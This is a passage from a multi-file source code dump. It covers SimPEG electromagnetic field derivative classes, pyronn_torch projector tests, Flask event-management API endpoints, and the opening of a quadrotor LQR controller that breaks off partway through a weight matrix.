e = self._MeSigmaI * ( self._edgeCurl.T * ( self._MfMui * bSolution))
for i, src in enumerate(srcList):
_, S_e = src.eval(self.prob)
e[:,i] = e[:,i] - self._MeSigmaI * S_e
return e
def _eSecondaryDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the secondary electric field with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary electric field with respect to the field we solved for with a vector
"""
if not adjoint:
return self._MeSigmaI * ( self._edgeCurl.T * ( self._MfMui * v) )
else:
return self._MfMui.T * (self._edgeCurl * (self._MeSigmaI.T * v))
def _eSecondaryDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the secondary electric field with respect to the inversion model
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary electric field with respect to the model with a vector
"""
bSolution = self[[src],'bSolution']
_, S_e = src.eval(self.prob)
Me = self._Me
if adjoint:
Me = Me.T
w = self._edgeCurl.T * (self._MfMui * bSolution)
w = w - Utils.mkvc(Me * S_e,2)
if not adjoint:
de_dm = self._MeSigmaIDeriv(w) * v
elif adjoint:
de_dm = self._MeSigmaIDeriv(w).T * v
_, S_eDeriv = src.evalDeriv(self.prob, v, adjoint)
de_dm = de_dm - self._MeSigmaI * S_eDeriv
return de_dm
def _e(self, bSolution, srcList):
"""
Total electric field is sum of primary and secondary
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total electric field
"""
return self._ePrimary(bSolution, srcList) + self._eSecondary(bSolution, srcList)
def _eDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total electric field with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect to the field we solved for with a vector
"""
return self._eSecondaryDeriv_u(src, v, adjoint)
def _eDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total electric field with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the electric field derivative with respect to the inversion model with a vector
"""
# assuming primary doesn't depend on model
return self._eSecondaryDeriv_m(src, v, adjoint)
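# The forward/adjoint branches above can be sanity-checked with the standard
# dot-product test, w . (D v) == (D^T w) . v. A toy sketch with random dense
# stand-ins for the mass matrices and the edge curl (illustrative only):
#
#     import numpy as np
#     rng = np.random.default_rng(1)
#     MeSigmaI = rng.standard_normal((4, 4))
#     MfMui = rng.standard_normal((6, 6))
#     C = rng.standard_normal((6, 4))
#     D  = lambda v: MeSigmaI @ (C.T @ (MfMui @ v))    # _eSecondaryDeriv_u
#     DT = lambda w: MfMui.T @ (C @ (MeSigmaI.T @ w))  # its adjoint
#     v, w = rng.standard_normal(6), rng.standard_normal(4)
#     assert np.isclose(w @ D(v), DT(w) @ v)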
class Fields_j(Fields):
"""
Fields object for Problem_j.
:param Mesh mesh: mesh
:param Survey survey: survey
"""
knownFields = {'jSolution':'F'}
aliasFields = {
'j' : ['jSolution','F','_j'],
'jPrimary' : ['jSolution','F','_jPrimary'],
'jSecondary' : ['jSolution','F','_jSecondary'],
'h' : ['jSolution','E','_h'],
'hPrimary' : ['jSolution','E','_hPrimary'],
'hSecondary' : ['jSolution','E','_hSecondary'],
}
def __init__(self, mesh, survey, **kwargs):
Fields.__init__(self, mesh, survey, **kwargs)
def startup(self):
self.prob = self.survey.prob
self._edgeCurl = self.survey.prob.mesh.edgeCurl
self._MeMuI = self.survey.prob.MeMuI
self._MfRho = self.survey.prob.MfRho
self._MfRhoDeriv = self.survey.prob.MfRhoDeriv
self._Me = self.survey.prob.Me
def _jPrimary(self, jSolution, srcList):
"""
Primary current density from source
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary current density as defined by the sources
"""
jPrimary = np.zeros_like(jSolution, dtype=complex)
for i, src in enumerate(srcList):
jp = src.jPrimary(self.prob)
jPrimary[:,i] = jPrimary[:,i] + jp
return jPrimary
def _jSecondary(self, jSolution, srcList):
"""
Secondary current density is the thing we solved for
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary current density
"""
return jSolution
def _j(self, jSolution, srcList):
"""
Total current density is sum of primary and secondary
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total current density
"""
return self._jPrimary(jSolution, srcList) + self._jSecondary(jSolution, srcList)
def _jDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total current density with respect to the thing we
solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect to the field we solved for with a vector
"""
return Identity()*v
def _jDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total current density with respect to the inversion model. Here, we assume that the primary does not depend on the model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the current density derivative with respect to the inversion model with a vector
"""
# assuming primary does not depend on the model
return Zero()
def _hPrimary(self, jSolution, srcList):
"""
Primary magnetic field from source
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary magnetic field as defined by the sources
"""
hPrimary = np.zeros([self._edgeCurl.shape[1], jSolution.shape[1]], dtype=complex)
for i, src in enumerate(srcList):
hp = src.hPrimary(self.prob)
hPrimary[:,i] = hPrimary[:,i] + hp
return hPrimary
def _hSecondary(self, jSolution, srcList):
"""
Secondary magnetic field from jSolution
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic field
"""
h = self._MeMuI * (self._edgeCurl.T * (self._MfRho * jSolution) )
for i, src in enumerate(srcList):
h[:,i] *= -1./(1j*omega(src.freq))
S_m, _ = src.eval(self.prob)
h[:,i] = h[:,i] + 1./(1j*omega(src.freq)) * self._MeMuI * S_m
return h
def _hSecondaryDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the secondary magnetic field with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary magnetic field with respect to the field we solved for with a vector
"""
if not adjoint:
return -1./(1j*omega(src.freq)) * self._MeMuI * (self._edgeCurl.T * (self._MfRho * v) )
elif adjoint:
return -1./(1j*omega(src.freq)) * self._MfRho.T * (self._edgeCurl * ( self._MeMuI.T * v))
def _hSecondaryDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the secondary magnetic field with respect to the inversion model
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary magnetic field with respect to the model with a vector
"""
jSolution = self[[src],'jSolution']
MeMuI = self._MeMuI
C = self._edgeCurl
MfRho = self._MfRho
MfRhoDeriv = self._MfRhoDeriv
Me = self._Me
if not adjoint:
hDeriv_m = -1./(1j*omega(src.freq)) * MeMuI * (C.T * (MfRhoDeriv(jSolution)*v ) )
elif adjoint:
hDeriv_m = -1./(1j*omega(src.freq)) * MfRhoDeriv(jSolution).T * ( C * (MeMuI.T * v ) )
S_mDeriv, _ = src.evalDeriv(self.prob, adjoint=adjoint)
if not adjoint:
S_mDeriv = S_mDeriv(v)
hDeriv_m = hDeriv_m + 1./(1j*omega(src.freq)) * MeMuI * (Me * S_mDeriv)
elif adjoint:
S_mDeriv = S_mDeriv(Me.T * (MeMuI.T * v))
hDeriv_m = hDeriv_m + 1./(1j*omega(src.freq)) * S_mDeriv
return hDeriv_m
def _h(self, jSolution, srcList):
"""
Total magnetic field is sum of primary and secondary
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total magnetic field
"""
return self._hPrimary(jSolution, srcList) + self._hSecondary(jSolution, srcList)
def _hDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total magnetic field with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect to the field we solved for with a vector
"""
return self._hSecondaryDeriv_u(src, v, adjoint)
def _hDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total magnetic field with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the magnetic field derivative with respect to the inversion model with a vector
"""
# assuming the primary doesn't depend on the model
return self._hSecondaryDeriv_m(src, v, adjoint)
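# The same dot-product test applies to the frequency-scaled branch in
# _hSecondaryDeriv_u. Note the pairing is bilinear (plain transpose, no
# complex conjugation), matching the .T used in the adjoint code above;
# omega(freq) = 2*pi*freq is again an assumed convention:
#
#     import numpy as np
#     rng = np.random.default_rng(2)
#     MeMuI, MfRho = rng.standard_normal((4, 4)), rng.standard_normal((6, 6))
#     C = rng.standard_normal((6, 4))
#     iw = 1j * 2 * np.pi * 1.0
#     G  = lambda v: -1./iw * (MeMuI @ (C.T @ (MfRho @ v)))
#     GT = lambda w: -1./iw * (MfRho.T @ (C @ (MeMuI.T @ w)))
#     v = rng.standard_normal(6) + 1j*rng.standard_normal(6)
#     w = rng.standard_normal(4) + 1j*rng.standard_normal(4)
#     assert np.isclose(w @ G(v), GT(w) @ v)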
class Fields_h(Fields):
"""
Fields object for Problem_h.
:param Mesh mesh: mesh
:param Survey survey: survey
"""
knownFields = {'hSolution':'E'}
aliasFields = {
'h' : ['hSolution','E','_h'],
'hPrimary' : ['hSolution','E','_hPrimary'],
'hSecondary' : ['hSolution','E','_hSecondary'],
'j' : ['hSolution','F','_j'],
'jPrimary' : ['hSolution','F','_jPrimary'],
'jSecondary' : ['hSolution','F','_jSecondary']
}
def __init__(self, mesh, survey, **kwargs):
Fields.__init__(self, mesh, survey, **kwargs)
def startup(self):
self.prob = self.survey.prob
self._edgeCurl = self.survey.prob.mesh.edgeCurl
self._MeMuI = self.survey.prob.MeMuI
self._MfRho = self.survey.prob.MfRho
def _hPrimary(self, hSolution, srcList):
"""
Primary magnetic field from source
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary magnetic field as defined by the sources
"""
hPrimary = np.zeros_like(hSolution, dtype=complex)
for i, src in enumerate(srcList):
hp = src.hPrimary(self.prob)
hPrimary[:,i] = hPrimary[:,i] + hp
return hPrimary
def _hSecondary(self, hSolution, srcList):
"""
Secondary magnetic field is the thing we solved for
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic field
"""
return hSolution
def _h(self, hSolution, srcList):
"""
Total magnetic field is sum of primary and secondary
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total magnetic field
"""
return self._hPrimary(hSolution, srcList) + self._hSecondary(hSolution, srcList)
def _hDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total magnetic field with respect to the thing we
solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect to the field we solved for with a vector
"""
return Identity()*v
def _hDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total magnetic field with respect to the inversion model. Here, we assume that the primary does not depend on the model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the magnetic field derivative with respect to the inversion model with a vector
"""
# assuming primary does not depend on the model
return Zero()
def _jPrimary(self, hSolution, srcList):
"""
Primary current density from source
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary current density as defined by the sources
"""
jPrimary = np.zeros([self._edgeCurl.shape[0], hSolution.shape[1]], dtype=complex)
for i, src in enumerate(srcList):
jp = src.jPrimary(self.prob)
jPrimary[:,i] = jPrimary[:,i] + jp
return jPrimary
def _jSecondary(self, hSolution, srcList):
"""
Secondary current density from hSolution
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary current density
"""
j = self._edgeCurl*hSolution
for i, src in enumerate(srcList):
_, S_e = src.eval(self.prob)
j[:,i] = j[:,i] - S_e
return j
def _jSecondaryDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the secondary current density with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary current density with respect to the field we solved for with a vector
"""
if not adjoint:
return self._edgeCurl*v
elif adjoint:
return self._edgeCurl.T*v
def _jSecondaryDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the secondary current density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the secondary current density derivative with respect to the inversion model with a vector
"""
_, S_eDeriv = src.evalDeriv(self.prob, v, adjoint)
return -S_eDeriv
def _j(self, hSolution, srcList):
"""
Total current density is sum of primary and secondary
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total current density
"""
return self._jPrimary(hSolution, srcList) + self._jSecondary(hSolution, srcList)
def _jDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total current density with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect to the field we solved for with a vector
"""
return self._jSecondaryDeriv_u(src,v,adjoint)
def _jDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total current density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the current density derivative with respect to the inversion model with a vector
"""
# assuming the primary does not depend on the model
return self._jSecondaryDeriv_m(src,v,adjoint)
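A hedged sketch of how these Fields subclasses are typically consumed; the names prob, m, and srcList below are illustrative stand-ins for a configured FDEM problem, model, and source list, not objects defined here:

    f = prob.fields(m)      # one of Fields_e / Fields_b / Fields_j / Fields_h
    e = f[srcList, 'e']     # aliasFields routes this to _ePrimary + _eSecondary
    b = f[srcList, 'b']     # same stored *Solution, different alias function

Whichever quantity was actually solved for ('eSolution', 'bSolution', ...), the alias table maps 'e', 'b', 'h', 'j' and their primary/secondary variants onto that stored solution through the _e/_b/_h/_j methods above, so downstream code stays formulation-agnostic.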
--------------------------------------------------------------------------------
tests/test_projection.py · resonance20/pyronn-torch @ 1707f955f9aecd3c3f8767e7d4516bd3b0298cfe · MIT · Python · 5,660 bytes
--------------------------------------------------------------------------------
#
# Copyright © 2020 Stephan Seitz <stephan.seitz@fau.de>
#
# Distributed under terms of the GPLv3 license.
"""
"""
import numpy as np
import pytest
import pyronn_torch
def test_init():
assert pyronn_torch.cpp_extension
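# A note on the parametrize values below: each parameter takes either the
# truthy string 'with_texture' / 'with_backward' or False, so every test runs
# once "enabled" and once "disabled" while the string doubles as a readable
# test ID (e.g. test_projection[with_texture-False]) -- presumably the intent.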
@pytest.mark.parametrize('with_texture', ('with_texture', False))
@pytest.mark.parametrize('with_backward', ('with_backward', False))
def test_projection(with_texture, with_backward):
projector = pyronn_torch.ConeBeamProjector(
(128, 128, 128), (2.0, 2.0, 2.0), (-127.5, -127.5, -127.5),
(2, 480, 620), [1.0, 1.0], (0, 0),
np.array(
[[[-3.10e+2, -1.20e+03, 0.00e+00, 1.86e+5],
[-2.40e+2, 0.00e+00, 1.20e+03, 1.44e+5],
[-1.00e+00, 0.00e+00, 0.00e+00, 6.00e+2]],
[[-2.89009888e+2, -1.20522754e+3, -1.02473585e-13, 1.86000000e+5],
[-2.39963440e+2, -4.18857765e+0, 1.20000000e+3, 1.44000000e+5],
[-9.99847710e-01, -1.74524058e-2, 0.00000000e+0,
6.00000000e+2]]]))
volume = projector.new_volume_tensor(
requires_grad=bool(with_backward))
volume += 1.
result = projector.project_forward(volume, use_texture=with_texture)
assert result is not None
if with_backward:
assert volume.requires_grad
assert result.requires_grad
loss = result.mean()
loss.backward()
@pytest.mark.parametrize('with_texture', ('with_texture', False))
@pytest.mark.parametrize('with_backward', ('with_backward', False))
def test_projection_backward(with_texture, with_backward):
projector = pyronn_torch.ConeBeamProjector(
(128, 128, 128), (2.0, 2.0, 2.0), (-127.5, -127.5, -127.5),
(2, 480, 620), [1.0, 1.0], (0, 0),
np.array(
[[[-3.10e+2, -1.20e+03, 0.00e+00, 1.86e+5],
[-2.40e+2, 0.00e+00, 1.20e+03, 1.44e+5],
[-1.00e+00, 0.00e+00, 0.00e+00, 6.00e+2]],
[[-2.89009888e+2, -1.20522754e+3, -1.02473585e-13, 1.86000000e+5],
[-2.39963440e+2, -4.18857765e+0, 1.20000000e+3, 1.44000000e+5],
[-9.99847710e-01, -1.74524058e-2, 0.00000000e+0,
6.00000000e+2]]]))
projection = projector.new_projection_tensor(
requires_grad=bool(with_backward))
projection += 1.
result = projector.project_backward(projection, use_texture=with_texture)
assert result is not None
assert result.shape == projector._volume_shape
if with_backward:
assert projection.requires_grad
assert result.requires_grad
loss = result.mean()
loss.backward()
@pytest.mark.parametrize('with_backward', ('with_backward', False))
def test_conrad_config(with_backward, with_texture=True):
pytest.importorskip("pyconrad")
projector = pyronn_torch.ConeBeamProjector.from_conrad_config()
volume = projector.new_volume_tensor(
requires_grad=bool(with_backward))
volume += 1.
result = projector.project_forward(volume, use_texture=with_texture)
import pyconrad.autoinit
pyconrad.imshow(result)
assert result is not None
if with_backward:
assert volume.requires_grad
assert result.requires_grad
loss = result.mean()
loss.backward()
def test_projection_backward_conrad(with_texture=True, with_backward=True):
pytest.importorskip("pyconrad")
projector = pyronn_torch.ConeBeamProjector.from_conrad_config()
projection = projector.new_projection_tensor(
requires_grad=bool(with_backward))
projection += 1000.
result = projector.project_backward(projection, use_texture=with_texture)
import pyconrad.autoinit
pyconrad.imshow(result)
assert result is not None
assert result.shape == projector._volume_shape
if with_backward:
assert projection.requires_grad
assert result.requires_grad
loss = result.mean()
loss.backward()
def test_conrad_forward_backward():
pytest.importorskip("pyconrad")
projector = pyronn_torch.ConeBeamProjector.from_conrad_config()
# import conebeam_projector
# other_projector = conebeam_projector.CudaProjector()
volume = projector.new_volume_tensor()
volume += 1.
result = projector.project_forward(volume, use_texture=False)
# import pyconrad.autoinit
# pyconrad.imshow(result)
reco = projector.project_backward(result, use_texture=False)
# import pyconrad.autoinit
# pyconrad.imshow(reco)
assert result is not None
assert reco is not None
def test_register_hook():
was_executed = False
def require_nonleaf_grad(v):
def hook(g):
nonlocal was_executed
was_executed = True
v.grad_nonleaf = g
v.register_hook(hook)
projector = pyronn_torch.ConeBeamProjector(
(128, 128, 128), (2.0, 2.0, 2.0), (-127.5, -127.5, -127.5),
(2, 480, 620), [1.0, 1.0], (0, 0),
np.array(
[[[-3.10e+2, -1.20e+03, 0.00e+00, 1.86e+5],
[-2.40e+2, 0.00e+00, 1.20e+03, 1.44e+5],
[-1.00e+00, 0.00e+00, 0.00e+00, 6.00e+2]],
[[-2.89009888e+2, -1.20522754e+3, -1.02473585e-13, 1.86000000e+5],
[-2.39963440e+2, -4.18857765e+0, 1.20000000e+3, 1.44000000e+5],
[-9.99847710e-01, -1.74524058e-2, 0.00000000e+0,
6.00000000e+2]]]))
x = projector.new_volume_tensor(requires_grad=True)
require_nonleaf_grad(x)
loss = projector.project_forward(x)
loss.mean().backward()
assert x.grad_nonleaf is not None
assert was_executed
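test_register_hook above relies on Tensor.register_hook to observe the gradient of a non-leaf tensor. A minimal standalone illustration of that PyTorch pattern, independent of pyronn_torch:

    import torch

    x = torch.ones(3, requires_grad=True)
    y = 2 * x                    # non-leaf tensor: its .grad is not retained
    grads = {}
    def capture(g):              # a hook returning None leaves the grad as-is
        grads['y'] = g
    y.register_hook(capture)
    y.sum().backward()
    assert torch.equal(grads['y'], torch.ones(3))   # dL/dy for L = y.sum()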
--------------------------------------------------------------------------------
services/event_service/event_info_services.py · hnguyenworkstation/hoocons_backend @ 725461812a172ca0a88181e3399e6e2294953273 · MIT · Python · 9,019 bytes
--------------------------------------------------------------------------------
from datetime import datetime
from flask_jwt import jwt_required, current_identity
from flask_restful import reqparse, Resource
from static import app_constant
import static.status as status
from models.base_event import BaseEvent
from models.action import BaseAction
class CreateEventRequest(Resource):
@jwt_required()
def post(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("text_context", type=str, location="json")
parser.add_argument("images", type=list, location="json")
parser.add_argument("contain_event", type=str, location="json")
parser.add_argument("privacy", type=str, location="json")
parser.add_argument("longitude", type=float, location="json")
parser.add_argument("latitude", type=float, location="json")
parser.add_argument("tags", type=list, location="json")
body = parser.parse_args()
event = BaseEvent(create_by=user, text_context=body.text_context,
images=body.images, contain_event=body.contain_event,
privacy=body.privacy, location=[body.longitude, body.latitude],
tags=body.tags).save()
# Now create an action
action = BaseAction(by_user=user, action_type=app_constant.action_create_new_event, target=event.id,
action_priority=app_constant.priority_medium).save()
user.update(add_to_set__posted_events=event, add_to_set__recent_actions=action,
last_online=datetime.utcnow())
return event.get_initial_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class UpdateEventRequest(Resource):
@jwt_required()
def put(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
parser.add_argument("text_context", type=str, location="json")
parser.add_argument("images", type=list, location="json")
parser.add_argument("contain_event", type=str, location="json")
parser.add_argument("privacy", type=str, location="json")
parser.add_argument("longitude", type=float, location="json")
parser.add_argument("latitude", type=float, location="json")
parser.add_argument("tags", type=list, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None or event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
event.update(text_context=body.text_context, images=body.images, contain_event=body.contain_event,
privacy=body.privacy, location=[body.longitude, body.latitude], tags=body.tags, is_edited=True,
last_edit_at=datetime.utcnow())
user.update(last_online=datetime.utcnow())
return event.get_complete_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class UpdateTextEventRequest(Resource):
@jwt_required()
def put(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
parser.add_argument("text_context", type=str, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None or event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
event.update(text_context=body.text_context, is_edited=True, last_edit_at=datetime.utcnow())
user.update(last_online=datetime.utcnow())
return event.get_complete_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class UpdateLocationEventRequest(Resource):
@jwt_required()
def put(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
parser.add_argument("longitude", type=float, location="json")
parser.add_argument("latitude", type=float, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None or event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
event.update(location=[body.longitude, body.latitude])
user.update(last_online=datetime.utcnow())
return event.get_complete_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class UpdateTagsEvent(Resource):
@jwt_required()
def put(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
parser.add_argument("tags", type=list, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None or event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
event.update(tags=body.tags)
user.update(last_online=datetime.utcnow())
return event.get_complete_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class DeleteEventRequest(Resource):
@jwt_required()
def delete(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None:
return {"message": "event does not exists"}, status.HTTP_501_NOT_IMPLEMENTED
if event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
# Enough permission and information -> remove event
user.update(pull__posted_events=event, last_online=datetime.utcnow())
event.delete()
return {"message": "success"}, status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class ReportEvent(Resource):
@jwt_required()
def post(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None:
return {"message": "event does not exists"}, status.HTTP_501_NOT_IMPLEMENTED
if event in user.posted_events:
return {"message": "can not report your own event"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
# Enough permission and information -> remove event
user.update(add_to_set__reported_events=event, last_online=datetime.utcnow())
event.update(add_to_set__reported_by=user)
return {"message": "success"}, status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
--------------------------------------------------------------------------------
quadrotor/src/quadrotor/controller.py · siavash1999/IDAS-quadrotor @ dc8daa9e699b696743dff970620f382257cb8802 · BSD-3-Clause · Python · 4,751 bytes
--------------------------------------------------------------------------------
from control import lqr
import numpy as np
# -------------------------------------------------------------------------------------------------
def Correction2D(K):
for i in range(len(K)):
for j in range(len(K[0])):
if abs(K[i][j]) < 1e-6:
K[i][j] = 0
return K
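# A vectorized equivalent, assuming K is already a NumPy array (the loop
# above also accepts plain nested lists): K[np.abs(K) < 1e-6] = 0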
# -------------------------------------------------------------------------------------------------
def Correction(K):
for i in range(len(K)):
if abs(K[i]) < 1e-3:
K[i] = 0
return K
# -------------------------------------------------------------------------------------------------
def hover(g, m, Ix, Iy, Iz):
#Define State and Input Matrices:
A = [[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0,-g, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[g, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0]]
B = [[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 1/Ix, 0 , 0 ],\
[0 , 0 , 1/Iy, 0 ],\
[0 , 0 , 0 , 1/Iz],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[-1/m, 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ]]
#Defining weight matrices Q and R for state and input matrices respectively:
Q = [[5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0],\
